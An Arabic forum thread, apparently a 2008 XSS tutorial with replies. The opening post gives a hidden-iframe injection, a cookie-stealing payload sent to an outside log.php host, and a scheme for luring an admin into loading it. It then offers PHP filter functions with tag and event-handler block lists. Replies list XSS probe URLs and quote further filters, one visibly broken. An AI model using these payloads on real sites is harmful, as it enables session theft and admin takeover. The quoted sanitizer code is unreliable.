بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي المركز التعليمي المجاني أمن المعلومات

أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
 
قديم 10-02-2008, 11:46 AM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
Smile دراسة مبسطة حول ثغرات الـ XSS !

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

مساكم الله بالخير .. كيف الحال عساكم بخير ان شاء الله

موضوعنا اليوم .. دراسة حول ثغرات الـ XSS .. والموضوع أمني هكري >> افهمها عاد

ثغرات الـ xss سمعنا فيها كثير .. وكأقرب مثال عندنا ثغرات التحويل بهاك آخر عشرة مواضيع و الاحصائيات

وغيره من السكريبتات ..

مقدمة /

عبارة xss .. هي اختصار للعبارة التالية " Cross Site Scripting " وبعض الأحيان تسمى الثغرات بإسم CSS

ثغرة الـ xss .. باختصار .. هي تمكن المخترق من حقن اكواد html داخل السكريبت المصاب

وتكون عن طريق خطأ برمجي داخل السكريبت ..

الخطورة /

تخيل معي انك داخل موقع ومحصل فيه ثغرة xss .. جاك واحد قال لك .. الحين انت تقدر تضيف للموقع
اي كود html .. سواء اكواد عادية او جافا سكريبت وغيره من توابع لغة html ..
هنا نبدا التفكير .. حنا وش نقدر نسوي بالـ html عشان نحقنها داخل الموقع ؟؟
ما توصلت له من نتايج بحثي البسيطة ..
1- سرقة كوكيز اي شخص داخل نظام السكريبت .
2- تلغيم الموقع بحقن كود html .. لثغرة بمتصح معين لتحميل الباتش بجهاز متصفحين السكريبت .
3- اضافة اي كود جافا سكريبت الى الموقع .
4- اضافة أي كود html بجميع انواعه الى الموقع .

اعتقد كذا الخطورة وضحت .. البعض كان يتوقع ان الثغرات ذي تافهه ومالها معنى .. لكن اللي يفكر زين

يحصل نتايج حلوة واستغلالات أقوى بإذن الله .. على سبيل المثال .. ركزوا على النتيجة رقم 2

تلاحظون ان الخطورة وصلت لحقن باتش بالسكريبت .. ومن ثم ينتشر بجهاز الزوار بمجرد تصفح السكريبت

من بين الزوار مدير السكريبت او صاحب الموقع او صاحب الاستضافة .. تخيلوا معي ان جهازه طاح فيه باتش

وش راح يوصل له الهكر ؟؟

جهازه + ايميله + بيانات المواقع بجهازه ..

وكل نتيجة من النتايج بالأعلى لها خطورة .. كل واحدة أخطر من الثانية للي يفكر ويستغل زين !!

================================
انواع ثغرات الـ XSS ..!!

1- xss داخلي .
2- xss خارجي .
================================

نبدا بتفصيل النوع الأول وهو الـ xss الداخلي ..

بكل بساطه وهي ان يتم حقن الكود داخل الموقع .. عن طريق الـ POST
كمثال ..
ثغرة الـ xss في هاك الاهداءات .. كيف يتم حقن الـ xss داخل المنتدى ؟؟

كل اللي عليك .. تدخل تسوي اضافة اهداء .. مكان محتوى الاهداء اكتب كود الـ html تبعك

كنك على الـ code داخل الفرونت بيج

ثم اضغط زر اضافة .. وسوي تحديث لصفحة المنتدى .. وبتلاحظ ان شريط الاهداءات شغال وفيه اهداءك

محقون بكود html .. يتنفذ في جميع الأجهزة اللي تشاهد الاهداءات !!

هنا نقول عنه حقن داخلي .. لأنه تم عن طريق الـ POST تبع الاهداءات " نموذج اضافة اهداء "

وبعد الكود داخلي محفوظ ويتنفذ للجميع ..

جرب شف اي سكريبت مصاب بثغرة xss داخليه

احقنه بهالكود

كود:
 <html>
<iframe name="I1" src="http://www.hack15.com" marginwidth="1" marginheight="1" height="1" width="1" scrolling="no" border="0" frameborder="0">
</iframe>
</iframe></p>
</html>
بمجرد حقن هذا الكود داخل السكريبت .. سيتم ادراج صفحة www.hack15.com داخل الموقع بشكل غير مرئي

.. لنفرض ان صفحة hack15.com .. فيها كود سحب الكوكيز .. او ملغومة بباتش .. أو أي كود html آخر خطر !!

وعدا ذلك من الأكواد اللي تقدر تبحث عنها بقوقل .. وتحقنها بسهولة داخل السكريبت المصاب ..

================================================

اما بالنسبة للنوع الثاني ..

ثغرات الـ xss الخارجية ..

هالنوع من الثغرات لايحقن من داخل الموقع .. ولكن من خارج الموقع عن طريق المتصفح من خلال رابط الموقع

ولايتم حفظ الحقن داخل الموقع .. بمعنى أصح .. الكود اللي تحقنه داخل الصفحة .. انت الوحيد اللي تشوفه ..

وبعد ما تستعرضه انت ما راح يشوفه احد غيرك !!

مثال ..

كود:
 www.site.com/show.php?edit=[xss]


مثل ما تلاحظون الملف المصاب هو show.php وفيه ثغرة xss في المتغير edit

بمعنى آخر .. اي كود نطبعه بعد علامة " = " يتم عرضه داخل الصفحة ==> لك فقط !!

تعالوا نجرب نحقن كود html لآظهار مربع رسالة خطأ مكتوب فيه .. Hacked By GeNiUs HaCkEr

.. شف الكود

كود:
<<SCRIPT>alert("Hacked By GeNiUs HaCkEr");//<</SCRIPT>
مع دجه بالثغره الافتراضية فوق

الحقن بيكون كذا

كود:
 www.site.com/show.php?edit=<<SCRIPT>alert("Hacked By GeNiUs HaCkEr");//<</SCRIPT>
جرب ادخل الرابط بالأعلى .. بتلاحظ ظهور مربع خطأ مكتوب فيه Hacked By GeNiUs HaCkEr

الحقن خارجي .. وكذلك الحقن ما يظهر إلا لك انت .. بمعنى آخر هالكود ينحقن وينعرض لك ثم ينحذف

ما احد يشوفه غير اللي يدخل رابط الحقن نفسه

هنا بيجي سؤال .. كيف أظهر الحقن ذا للضحية اللي ابيه يشوفه

يعني ارسل رسالة لمدير الموقع اقول له يدخل الرابط ذا

كود:
  www.site.com/show.php?edit=<<SCRIPT>alert("Hacked By GeNiUs HaCkEr");//<</SCRIPT>
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

صعبة شوي .. ومالها فايده .. بيفهم الثغرة بالراحة .. ^_^

جاك واحد ثاني قال لا !!

يقول لك اخونا في الله .. شرايكم .. نسوي ملف log.php على موقع ثاني .. مهمته يستقبل اي معلومات توصل له

ويرسلها لايميلك

الآن .. نستخدم ثغرة الـ xss في الموقع .. نعطيها أمر سحب الكوكيز من جهاز الضحية .. ويرسلها لملف log.php

وملف log.php .. يوصلها لنا برسالة .. بعدها حنا .. ناخذ الكوكيز .. ونفكه وندخل بعضوية المدير العام ونخترق السكريبت !!

شف على سبيل المثال نحقن ذا الكود /

كود:
 <Script>dcidcilocation.href="http://www.hack15.com/log/log.php"+dcidcidocument.coockie</Script>
تعالوا نحقنه عن طريق الرابط
كود:
 www.site.com/show.php?edit=<<SCRIPT>dcidcilocation.href="http://www.hack15.com/log/log.php"+dcidcidocument.coockie<</SCRIPT>
الحين اي شخص يدخل الرابط المحقون ذا .. بيسحب الكوكيز من جهازه ويرسلها لملف log.php

كيف نخلي مدير الموقع أو الضحية يفتح الرابط ذا عشان نسحب كوكيزه ؟؟

أو بمعنى أصح كيف الهكر يسحب الكوكيز ويدخلني انا كصاحب سكريبت فيه هالثغره ويسحب كوكيزي ؟؟

بسيطه جداً عالهكر .. يسوي صفحة html عاديه ويضيف لها فريم داخلي مخفي .. ( iframe )

انه فتح لي هالرابط داخل الصفحة بدون ما الاحظ فتحه او افتحه بنفسي

كود:
 www.site.com/show.php?edit=<<SCRIPT>dcidcilocation.href="http://www.hack15.com/log/log.php"+dcidcidocument.coockie<</SCRIPT>

ويرفعه على اي موقع .. ويدخلنا فيه عاد بطريقته ويسحب الكوكيز !!

عاد الهكر .. كل واحد يطور براحته في الثغره .. خاصة اللي يفهم بلغة الجافا سكريبت ..

يسوي أكثر من كذا !!

================================================== ========================

الحل /

ان اكتشفت انه فيه ثغرة داخل ملف add.php مثلاً بأحد السكريبتات بموقعك

فيه طريقتين للحل .. حسب ما بحثت وقريت ..

الحل الأول .. تعدل على الكود .. وتمنع اكواد الـ html من التنفيذ

او تضيف function Remove XSS

حصلته في أحد المواضيع للأخ jadweb.com

وصراحه جربته .. وفعال وناجح !!

مثل الفلتر .. يفلتر لك النصوص بأحد المتغيرات

ظيفة الـ function هي حذف اي ثغرة من نوع XSS بشكل نهائي لو يتم استخدامه

في اي برنامج راح يزيد نسبة الآمان بشكل كبير .

طبعاً هذا كود الـ function
كود:
function RemoveXSS($val) {
   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
   // this prevents some character re-spacing such as <java\0script>
   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
   $val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);

   // straight replacements, the user should never need these since they're normal characters
   // this prevents like <IMG SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
   $search = 'abcdefghijklmnopqrstuvwxyz';
   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
   $search .= '1234567890!@#$%^&*()';
   $search .= '~`";:?+/={}[]-_|\'\\';
   for ($i = 0; $i < strlen($search); $i++) {
      // ;? matches the ;, which is optional
      // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars

      // &#x0040 @ search for the hex values
      $val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
      // @ @ 0{0,7} matches '0' zero to seven times
      $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
   }

   // now the only remaining whitespace attacks are \t, \n, and \r
   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
   $ra = array_merge($ra1, $ra2);

   $found = true; // keep replacing as long as the previous round replaced something
   while ($found == true) {
      $val_before = $val;
      for ($i = 0; $i < sizeof($ra); $i++) {
         $pattern = '/';
         for ($j = 0; $j < strlen($ra[$i]); $j++) {
            if ($j > 0) {
               $pattern .= '(';
               $pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
               $pattern .= '|(&#0{0,8}([9][10][13]);?)?';
               $pattern .= ')?';
            }
            $pattern .= $ra[$i][$j];
         }
         $pattern .= '/i';
         $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
         $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
         if ($val_before == $val) {
            // no replacements were made, so exit the loop
            $found = false;
         }
      }
   }
}
لكن صعبه كل سكريبت .. نكتب هالسطور الطويله بأعلاه ..

لذلك اختصره عليكم

ذي صفحة php
كود:
 <?
function RemoveXSS($val) {
   // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
   // this prevents some character re-spacing such as <java\0script>
   // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
   $val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);

   // straight replacements, the user should never need these since they're normal characters
   // this prevents like <IMG SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
   $search = 'abcdefghijklmnopqrstuvwxyz';
   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
   $search .= '1234567890!@#$%^&*()';
   $search .= '~`";:?+/={}[]-_|\'\\';
   for ($i = 0; $i < strlen($search); $i++) {
      // ;? matches the ;, which is optional
      // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars

      // &#x0040 @ search for the hex values
      $val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
      // @ @ 0{0,7} matches '0' zero to seven times
      $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
   }

   // now the only remaining whitespace attacks are \t, \n, and \r
   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
   $ra = array_merge($ra1, $ra2);

   $found = true; // keep replacing as long as the previous round replaced something
   while ($found == true) {
      $val_before = $val;
      for ($i = 0; $i < sizeof($ra); $i++) {
         $pattern = '/';
         for ($j = 0; $j < strlen($ra[$i]); $j++) {
            if ($j > 0) {
               $pattern .= '(';
               $pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
               $pattern .= '|(&#0{0,8}([9][10][13]);?)?';
               $pattern .= ')?';
            }
            $pattern .= $ra[$i][$j];
         }
         $pattern .= '/i';
         $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
         $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
         if ($val_before == $val) {
            // no replacements were made, so exit the loop
            $found = false;
         }
      }
   }
}
?>
احفظ هالصفحة بإسم xss.php

وارفعها داخل مجلد السكريبت اللي فيه الملف المصاب

ثم ادخل الملف المصاب وضيف له هالسطر بأعلى الكود

كود:
 include (xss.php);
الآن لابد تلاحظ المتغير المصاب .. وتسوي له فلتره ..

كمثال المتغير name .. عملية الفلترة كالتالي

كود:
 $name = RemoveXSS($HTTP_POST_VARS['name']);
وهذي دالة خفيفة وصغيرة جداً .. وتم استخدامها بترقيع هاك الاهداءات " فعالة "

كود:
 function clean($val){ 
        return htmlspecialchars(strip_tags(addslashes($val))); 
}

تؤدي الغرض بإذن الله

هذا والله اعلم

أخوكم في الله .. حسين

تشآآآآآآآآآآآآآآآآآآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #21  
قديم 29-04-2008, 02:15 AM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

العفوو حياك الله

أخوي هالكود .. هو كود عمل دالة خاصة بك بإسم clean

داخل هالدالة فيه الكود اللي يمنع عملية اضافة اكواد Html وأعلامها ويوقفها

طبعاً بدون ما تكرر هالكود على كل متغير مصاب

تسويه على شكل هالدالة

ثم تشغل الدالة على أي متغير بالطريقة ذي

clean(here)

here .. هنا المتغير اللي تبي الدالة clean تشتغل عليه ( تفلتره )

اذا اهتميت بهالشي حاول تقرا مبادئ في الـ php حتى تفهمها بشكل أوضح

تشآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #22  
قديم 29-04-2008, 02:24 PM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
الافتراضي

إقتباس:

طبعاً بدون ما تكرر هالكود على كل متغير مصاب


مشكور يالغالي على هذا الشرح الجميل والله يوفقك ويسعدك ويخليك لعين من ترجيك

إقتباس:

اذا اهتميت بهالشي حاول تقرا مبادئ في الـ php حتى تفهمها بشكل أوضح


وأشكرك على هذه النصيحه الجميله يالغالي





  #23  
قديم 29-04-2008, 06:00 PM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

آمين الجميع ..

حياك الله طال عمرك

تشآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #24  
قديم 29-04-2008, 08:13 PM
الصورة الشخصية لـ o24host.com
o24host.com o24host.com غير متصل
عضو
 
تاريخ التسجيل: Apr 2008
مشاركة: 13
مستوى تقييم العضوية: 0
o24host.com is on a distinguished road
الافتراضي

يعطيك العافيه ممتاز اكثر من رائع






التوقيع
أوكسجين لخدمات مواقع الانترنت سعوديه100%
استضافه - تصميم - سيرفرات - ريسلرات - برمجيات
http://www.o24host.com
http://www.o24host.net
http://www.o24host.org
  #25  
قديم 29-04-2008, 11:58 PM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

الله يعافيك ..

تشآآآآآآآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #26  
قديم 02-05-2008, 05:19 AM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
الافتراضي

أخوي ^*GENIUS*^

اثناء تصفحي لموقع ترايدنت وجدت أحدى الأخوه نقل موضوعه عن موقع php



الدالة عبارة عن فلترة للحقل عن javascript, html, sql injections, and RFI ..

إقتباس:

<?php
function entities($text){
$text = "";
for ( $i = 0; $i <= strlen($text) - 1; $i += 1) {
$text .= "&#" .ord($text{$i});
}
return $eresult;
}
function filter($text){
if (preg_match("#(on(.*?)\=|script|xmlns|expression|
javascript|\>|\<|http)#si","$text",$ntext)){
$re = entities($ntext[1]);
$text = str_replace($ntext[0],$re,$text);
}
$text = mysql_real_escape_string($text);
return $text;
}
foreach ($_POST as $x => $y){
$_POST[$x] = filter($y);
}
foreach ($_GET as $x => $y){
$_GET[$x] = filter($y);
}
foreach ($_COOKIE as $x => $y){
$_COOKIE[$x] = filter($y);
}
?>




ولقد وجدت كذلك أثناء تصفحي لإحدى المواقع داله مشابهه للسابقه وهي :

إقتباس:

function security_mtwer($mtwer) {
if(is_array($mtwer)) {
$mtwer = array_map('security', $mtwer);
} else {
if(!get_magic_quotes_gpc()) {
$mtwer = htmlspecialchars($mtwer, ENT_QUOTES);
$mtwer=addslashes(trim($mtwer));
} else {
$mtwer = htmlspecialchars(stripslashes($mtwer), ENT_QUOTES);
$mtwer=addslashes(trim($mtwer));
}
$mtwer = str_replace("\\", "\\\\", $mtwer);
}
return $mtwer;
}

$_POST = security_mtwer($_POST);
$_GET = security_mtwer($_GET);




أحببت ان أضيف هذه الإضافات ليتم التعليق عليها ومشاركتنا في كون اي أفضل منهن ولماذا

وأعتذر لإستاذي العزيز ^*GENIUS*^





  #27  
قديم 02-05-2008, 09:14 AM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

حياك الله

شكراً للإضافة كلها تؤدي الغرض لكن انت اختار الأقل في عدد السطور حتى يكون سكريبتك خفيف

وما يثقل عليك .. بالتوفيق

تشآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #28  
قديم 02-05-2008, 08:19 PM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
Awt9

أشكرك أخوي على التوضيح ولكن عندي سؤال

وأدري أشغلتك معااي

انا يوم جيت اسوي اللي قلتلنا عليه قلت ابي اكشف عن موقعي ولقيت هذي الثغرات

كود:
http://www.site.com/vb/showthread.php?goto=newpost&t=578#goto_displaymodes<script>alert('hacking%20xss')</script>

http://www.site.com/vb/newreply.php?do=newreply&amp;noquote=1&amp;p=8682<script>alert('hacking%20xss')</script>

http://www.site.com/vb/sendmessage.php?do=sendtofriend&amp;t=594<script>alert('hacking%20xss')</script>

http://www.site.com/vb/private.php?s=<script>alert('hacking%20xss')</script>

http://www.site.com/vb/search.php?do=finduser&amp;u=113<script>alert('hacking%20xss')</script>

http://www.site.com/vb/forumdisplay.php?s=<script>alert('hacking%20xss')</script>

http://www.site.com/vb/index.php?s=<script>alert('hacking%20xss')</script>

http://www.site.com/vb/faq.php?s=<script>alert('hacking%20xss')</script>
فياليت توضح لي كيف تتم سد هذي الثغرات لاني سويت اللي قلت لي والمشكله ان المنتدى صاير مايشتغل بسبب ان الحركه الي قلتلنا عليها هي تحذف الكوكيز وابي اعرف بالتفصيل كيف افلتر هذه الثغرات وكيف أسدها

فياليت يا اخوي الغالي ابي شرح مفصل لاني أخاف اسوي شيء في المنتدى واخطي وياليت يكون الشرح بالصور يكون افضل

ومارايح ننساك من دعائنا أبدا الله يبارك فيك وفي ذريتك






آخر تعديل بواسطة alromnce ، 02-05-2008 الساعة 08:22 PM.
  #29  
قديم 02-05-2008, 08:51 PM
الصورة الشخصية لـ Mustafa Albazy
Mustafa Albazy Mustafa Albazy غير متصل
مصطفى البازي
 
تاريخ التسجيل: Mar 2004
المدينة: المملكة المتحدة - لندن
مشاركة: 1,558
مستوى تقييم العضوية: 10
Mustafa Albazy is on a distinguished road
وسام المشرف المميز في الويب العربي وسام الويب البرونزي وسام الويب الفضي وسام الويب الذهبي 
عدد الأوسمة: 4 (المزيد ...)
الافتراضي

أخوي هاذا ما تعتبر ثغرات خلاص

هاذا للنسخ القديمة جداً الان ما عاد تشتغل بس قلي كم النسخة الي مركبة


++++++++++++++


مشكور اخوي أبو عابد ما تقصر طال عمرك






التوقيع
  #30  
قديم 03-05-2008, 02:06 AM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
الافتراضي

انا موعارف يوم كتبت الرد وموقعي صرت ما اقدر ادخل عليه

إقتباس:

Fatal error: Maximum execution time of 30 seconds exceeded in /home/site/public_html/vb/includes/functions.php(5 166) : eval()'d code on line 65


فيه حل والعذر والسموحه لو كان الرد مو في مكانه بس من العجله واني مختبص المنتدى مو راضي يشتغل نهائياً

ابي فزعتكم يارجال





  #31  
قديم 03-05-2008, 03:52 AM
الصورة الشخصية لـ Mustafa Albazy
Mustafa Albazy Mustafa Albazy غير متصل
مصطفى البازي
 
تاريخ التسجيل: Mar 2004
المدينة: المملكة المتحدة - لندن
مشاركة: 1,558
مستوى تقييم العضوية: 10
Mustafa Albazy is on a distinguished road
وسام المشرف المميز في الويب العربي وسام الويب البرونزي وسام الويب الفضي وسام الويب الذهبي 
عدد الأوسمة: 4 (المزيد ...)
الافتراضي

أخوي انت معدل على ملف function.php






التوقيع
  #32  
قديم 03-05-2008, 10:48 AM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
الافتراضي

لا يالغالي انا ماعدلت عليه بس انا حطيت ملف xss.php

في المجلد vb
زي ماقال لنا أخوي ^*GENIUS*^

وجلست يومين وبعدها تقفل نهائيا مايمديني اشوف المنتدى نبي حل الله يعزكم ويخليكم ذخر لمن يرجيكم






آخر تعديل بواسطة alromnce ، 03-05-2008 الساعة 10:51 AM. السبب: إضافه
  #33  
قديم 03-05-2008, 06:58 PM
الصورة الشخصية لـ Mustafa Albazy
Mustafa Albazy Mustafa Albazy غير متصل
مصطفى البازي
 
تاريخ التسجيل: Mar 2004
المدينة: المملكة المتحدة - لندن
مشاركة: 1,558
مستوى تقييم العضوية: 10
Mustafa Albazy is on a distinguished road
وسام المشرف المميز في الويب العربي وسام الويب البرونزي وسام الويب الفضي وسام الويب الذهبي 
عدد الأوسمة: 4 (المزيد ...)
الافتراضي

إقتباس:

اقتباس من مشاركة alromnce   مشاهدة المشاركة

   لا يالغالي انا ماعدلت عليه بس انا حطيت ملف xss.php

في المجلد vb
زي ماقال لنا أخوي ^*GENIUS*^

وجلست يومين وبعدها تقفل نهائيا مايمديني اشوف المنتدى نبي حل الله يعزكم ويخليكم ذخر لمن يرجيكم


طيب شيل الملف الي خليتة + الأشياء الي ضفتهم في بقيت الصفحات وشوف بيشتغل ولا لا

بس غريبة ليش تخليهم في المنتدى والمنتدى مافية ثغرات من هل النوع الى اذا مركب هاكات ممكن يكون في الهاك نفسة






التوقيع
  #34  
قديم 03-05-2008, 11:05 PM
الصورة الشخصية لـ alromnce
alromnce alromnce غير متصل
عضو
 
تاريخ التسجيل: May 2007
مشاركة: 39
مستوى تقييم العضوية: 0
alromnce is on a distinguished road
الافتراضي

أخوي العزيز IrIsH

انا شلت الملف اللي انا ذكرته واللي واللحين والمنتدى انا ما اقدر ادخل عليه ومايشتغل اصلا

وربي قهر ابي حل يالنشاما





  #35  
قديم 04-05-2008, 02:03 AM
الصورة الشخصية لـ Mustafa Albazy
Mustafa Albazy Mustafa Albazy غير متصل
مصطفى البازي
 
تاريخ التسجيل: Mar 2004
المدينة: المملكة المتحدة - لندن
مشاركة: 1,558
مستوى تقييم العضوية: 10
Mustafa Albazy is on a distinguished road
وسام المشرف المميز في الويب العربي وسام الويب البرونزي وسام الويب الفضي وسام الويب الذهبي 
عدد الأوسمة: 4 (المزيد ...)
الافتراضي

حط رابط موقعك + أفتح موضوع في قسم حل مشاكل المنتديات

لئن هاذا مضوع ثاني مالة دخل بمشكلتك

+ حط كل ماسويت في المنتدى علشان نشوفلك الحل المناسب

والسلام عليكم






التوقيع
  #36  
قديم 04-05-2008, 03:07 AM
T.U.N T.U.N غير متصل
عضو
 
تاريخ التسجيل: Mar 2008
مشاركة: 12
مستوى تقييم العضوية: 0
T.U.N is on a distinguished road
الافتراضي

الله يعطيك العافيه





  #37  
قديم 04-05-2008, 05:12 PM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

العفو الله يعافيكم ..

بالنسبة لك أخوي alromnce

توجه لملف includes/functions.php

وشف السطر 166 .. انسخه لنا هنا لا هنت

فيه أحد معدل عليه .. اعتقد انك مغير مسارات او شي كذا بطريقة خاطئة ..

تشآآو






التوقيع
كنتُ هنا يوماً ما ...
  #38  
قديم 09-05-2008, 03:57 PM
الصورة الشخصية لـ fahd4.com
fahd4.com fahd4.com غير متصل
عضو
 
تاريخ التسجيل: Feb 2008
مشاركة: 94
مستوى تقييم العضوية: 17
fahd4.com is on a distinguished road
الافتراضي

يعطيك العافيه ياعسل





  #39  
قديم 09-05-2008, 10:45 PM
